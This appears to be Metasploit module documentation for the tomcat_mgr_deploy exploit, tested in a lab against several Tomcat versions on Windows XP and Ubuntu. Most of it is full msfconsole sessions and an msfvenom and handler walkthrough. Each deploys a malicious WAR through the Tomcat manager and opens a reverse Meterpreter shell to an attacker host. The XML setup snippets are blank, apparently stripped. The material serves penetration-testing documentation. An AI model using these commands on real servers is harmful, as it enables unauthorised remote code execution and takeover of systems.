# Documentation Format This documentation is slightly different from the standard module documentation due to the variation in variables/privileges/versions that can affect how exploitation happens. This documentation is broken down by OS, Tomcat version, then privilege to show exploitation at each way. # Cleanup It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat. This must be done manually. ## Windows (xp sp2) ### Tomcat 6 (6.0.48) #### Setup 1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html) 2. Download and install [Tomcat6](http://apache.osuosl.org/tomcat/tomcat-6/v6.0.48/bin/apache-tomcat-6.0.48.exe) The install was default, other than adding a user during install. No other options were changed. The install assgined the new user the role `manager-gui`, which is Tomcat 7+ syntax. For this exploitation, it was changed to simply `manager` #### text/script Interface 1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 6.0\tomcat-users.xml` to add the following under the `` line: ``` ``` 2. Restart Tomcat service 3. Exploit: ``` msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 rhost => 192.168.2.108 msf exploit(tomcat_mgr_deploy) > set verbose true verbose => true msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat HttpPassword => tomcat msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat HttpUsername => tomcat msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(tomcat_mgr_deploy) > set target 1 target => 1 msf exploit(tomcat_mgr_deploy) > set rport 8086 rport => 8086 msf exploit(tomcat_mgr_deploy) > set path /manager path => /manager msf exploit(tomcat_mgr_deploy) > exploit [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Java Universal" [*] Uploading 6071 bytes as scEYoK0.war ... [!] No active DB -- Credential data will not be saved! [*] Executing /scEYoK0/jgj6tWcImjhc7rH2F4TDjCpXG.jsp... [*] Undeploying scEYoK0 ... [*] Sending stage (49409 bytes) to 192.168.2.108 [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:1663) at 2017-01-14 14:30:52 -0500 meterpreter > sysinfo Computer : winxp OS : Windows XP 5.1 (x86) Meterpreter : java/windows ``` ### Tomcat 7 (7.0.73) #### Setup 1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html) 2. Download and install [Tomcat7](http://apache.osuosl.org/tomcat/tomcat-7/v7.0.73/bin/apache-tomcat-7.0.73.exe) The install was default, other than adding a user during install. No other options were changed. Of note, while the user was given `manager-gui` permissions, they didn't actually define that role. So the `/manager/html` page was visible, but deploying from there wasn't possible. #### text/script Interface 1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 7.0\tomcat-users.xml` to add the following under the `` line: ``` ``` 2. Restart the service 3. Exploitation: ``` msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 rhost => 192.168.2.108 msf exploit(tomcat_mgr_deploy) > set path /manager/text path => /manager/text msf exploit(tomcat_mgr_deploy) > set verbose true verbose => true msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat HttpPassword => tomcat msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat HttpUsername => tomcat msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_deploy) > set rport 8087 rport => 8087 msf exploit(tomcat_mgr_deploy) > set payload java/ set payload java/meterpreter/bind_tcp set payload java/meterpreter/reverse_tcp set payload java/shell_reverse_tcp set payload java/meterpreter/reverse_http set payload java/shell/bind_tcp set payload java/meterpreter/reverse_https set payload java/shell/reverse_tcp msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(tomcat_mgr_deploy) > set target 1 target => 1 msf exploit(tomcat_mgr_deploy) > exploit [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Java Universal" [*] Uploading 6086 bytes as Cl6t6gurtwIO59zV3Lt6.war ... [!] No active DB -- Credential data will not be saved! [*] Executing /Cl6t6gurtwIO59zV3Lt6/qTIP.jsp... [*] Undeploying Cl6t6gurtwIO59zV3Lt6 ... [*] Sending stage (49409 bytes) to 192.168.2.108 [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1656) at 2017-01-14 14:27:21 -0500 meterpreter > sysinfo Computer : winxp OS : Windows XP 5.1 (x86) Meterpreter : java/windows ``` ### Tomcat 8 (8.0.39) #### Setup 1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html) 2. Download and install [Tomcat8](http://apache.osuosl.org/tomcat/tomcat-8/v8.0.39/bin/apache-tomcat-8.0.39.exe) The install was default, other than adding a user during install. No other options were changed. Of note, while the user was given `manager-gui` permissions, they didn't actually define that role. So the /manager/html page was visible, but deploying from there wasn't possible. #### text/script interface 1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml` to add the following under the ` ``` 2. Restart the service 3. Exploitation: ``` msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 rhost => 192.168.2.108 msf exploit(tomcat_mgr_deploy) > set rport 8088 rport => 8088 msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat HttpPassword => tomcat msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat HttpUsername => tomcat msf exploit(tomcat_mgr_deploy) > set target 1 target => 1 msf exploit(tomcat_mgr_deploy) > exploit msf exploit(tomcat_mgr_deploy) > set path /manager/text path => /manager/text msf exploit(tomcat_mgr_deploy) > exploit [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Java Universal" [*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ... [*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp... [*] Undeploying c6TYmkd8YAe8LqKQhSCr ... [*] Sending stage (49409 bytes) to 192.168.2.108 [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500 meterpreter > sysinfo Computer : winxp OS : Windows XP 5.1 (x86) Meterpreter : java/windows ``` ## Linux ### Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit #### Setup 1. Install Tomcat and dependencies: `sudo apt-get install tomcat6 tomcat6-admin` #### Exploit 1. Edit `/etc/tomcat6/tomcat-users.xml` to add the following: ``` ``` 2. Restart Tomcat: `sudo service tomcat6 restart` 3. Exploit: ``` msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156 rhost => 192.168.2.156 msf exploit(tomcat_mgr_deploy) > set rport 8080 rport => 8080 msf exploit(tomcat_mgr_deploy) > set verbose true verbose => true msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat HttpUsername => tomcat msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat HttpPassword => tomcat msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp payload => linux/x86/mettle/reverse_tcp msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_deploy) > set target 3 target => 3 msf exploit(tomcat_mgr_deploy) > exploit [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Linux x86" [*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ... [!] No active DB -- Credential data will not be saved! [*] Executing /9bj4IYa66cSpdK/g3Yxbv3.jsp... [*] Transmitting intermediate stager...(106 bytes) [*] Sending stage (335800 bytes) to 192.168.2.156 [*] Undeploying 9bj4IYa66cSpdK ... [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500 meterpreter > sysinfo Computer : Ubuntu14.04 OS : Ubuntu 14.04 (Linux 4.2.0-27-generic) Architecture : x64 Meterpreter : x86/linux ``` ### Tomcat7 (7.0.68) - Ubuntu server 16.04 64bit Of note, as of Tomcat 7, the permission role 'manager' has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation. #### Setup 1. Install Tomcat and dependencies: `apt-get install tomcat7 tomcat7-admin` #### text/script interface 1. Edit `/etc/tomcat7/tomcat-users.xml` to add: ``` ``` 2. Restart Tomcat: `sudo service tomcat7 restart` 1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy] ` as opposed to `403 Access Denied` 3. Exploit: ``` msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118 rhost => 192.168.2.118 msf exploit(tomcat_mgr_deploy) > set rport 8087 rport => 8087 msf exploit(tomcat_mgr_deploy) > set target 3 target => 3 msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp payload => linux/x86/mettle/reverse_tcp msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat HttpUsername => tomcat msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat HttpPassword => tomcat msf exploit(tomcat_mgr_deploy) > set verbose true verbose => true msf exploit(tomcat_mgr_deploy) > exploit msf exploit(tomcat_mgr_deploy) > set path /manager/text path => /manager/text msf exploit(tomcat_mgr_deploy) > exploit [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Linux x86" [*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ... [!] No active DB -- Credential data will not be saved! [*] Executing /9QymzSGGU0H4e/Mfz7dGecAsKTjSxfZgBv.jsp... [*] Undeploying 9QymzSGGU0H4e ... [*] Transmitting intermediate stager...(106 bytes) [*] Sending stage (335800 bytes) to 192.168.2.118 [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500 meterpreter > sysinfo Computer : 192.168.2.118 OS : Ubuntu 16.04 (Linux 4.4.0-21-generic) Architecture : x64 Meterpreter : x86/linux ``` #### gui interface Attempted to get the the GUI one to work, I wasn't able to. I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`. However, my attempts were unsuccessful. ### Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit Of note, as of 7, the permission role 'manager' has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation. #### Setup 1. `apt-get install tomcat8 tomcat8-admin` #### text/script interface 1. Edit `/etc/tomcat8/tomcat-users.xml` to add: ``` ``` 2. Restart tomcat: `sudo service tomcat8 restart` 1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy] ` as opposed to `403 Access Denied` 3. Exploit: ``` msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118 rhost => 192.168.2.118 msf exploit(tomcat_mgr_deploy) > set rport 8088 rport => 8088 msf exploit(tomcat_mgr_deploy) > set target 3 target => 3 msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp payload => linux/x86/mettle/reverse_tcp msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat HttpUsername => tomcat msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat HttpPassword => tomcat msf exploit(tomcat_mgr_deploy) > set verbose true verbose => true msf exploit(tomcat_mgr_deploy) > set path /manager/text path => /manager/text msf exploit(tomcat_mgr_deploy) > exploit [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Linux x86" [*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ... [!] No active DB -- Credential data will not be saved! [*] Executing /9s0fTUyPa2HJCDnod2wEQJ/ndAfDrUY.jsp... [*] Undeploying 9s0fTUyPa2HJCDnod2wEQJ ... [*] Transmitting intermediate stager...(106 bytes) [*] Sending stage (335800 bytes) to 192.168.2.118 [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500 meterpreter > sysinfo Computer : 192.168.2.118 OS : Ubuntu 16.04 (Linux 4.4.0-59-generic) Architecture : x64 Meterpreter : x86/linux ``` #### gui interface Attempted to get the the GUI one to work, I wasn't able to. I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`. However, my attempts were unsuccessful. # Manual Exploitation ## Create payload This was performed on Windows XP with the following permissions as the user that was used to login: Tomcat 6.0.48: manager Tomcat 7.0.73: manager-gui Tomcat 8.0.39: manager-gui ``` /metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war Payload size: 6072 bytes Final size of war file: 6072 bytes Saved as: meterp.war ``` ## Setup Handler ``` msf > use exploit/multi/handler msf exploit(handler) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(handler) > set lport 7777 lport => 7777 msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.2.117:7777 [*] Starting the payload handler... ``` ## Deploy 1. With a web browser, browse to `http://:/manager/html` 2. Enter credentials (no default) 3. Under `Deploy` > `WAR file to deploy`, click browse to select `meterp.war`, click `Deploy` 4. `meterp` should now be listed under `Applications`, meaning it was successfully deployed. 5. Either click the link for `/meterp` or browse to `http://:/meterp/` ## Callback After browsing to that page, code execution will happen, and your callback will hit. ``` [*] Starting the payload handler... [*] Sending stage (49409 bytes) to 192.168.2.108 [*] Meterpreter session 1 opened (192.168.2.117:7777 -> 192.168.2.108:1704) at 2017-01-14 14:53:37 -0500 meterpreter > sysinfo Computer : winxp OS : Windows XP 5.1 (x86) Meterpreter : java/windows ``` ## Cleanup This will NOT remove the meterpreter from Tomcat, click `Undeploy` within the `Application` list to remove `meterp` from Tomcat.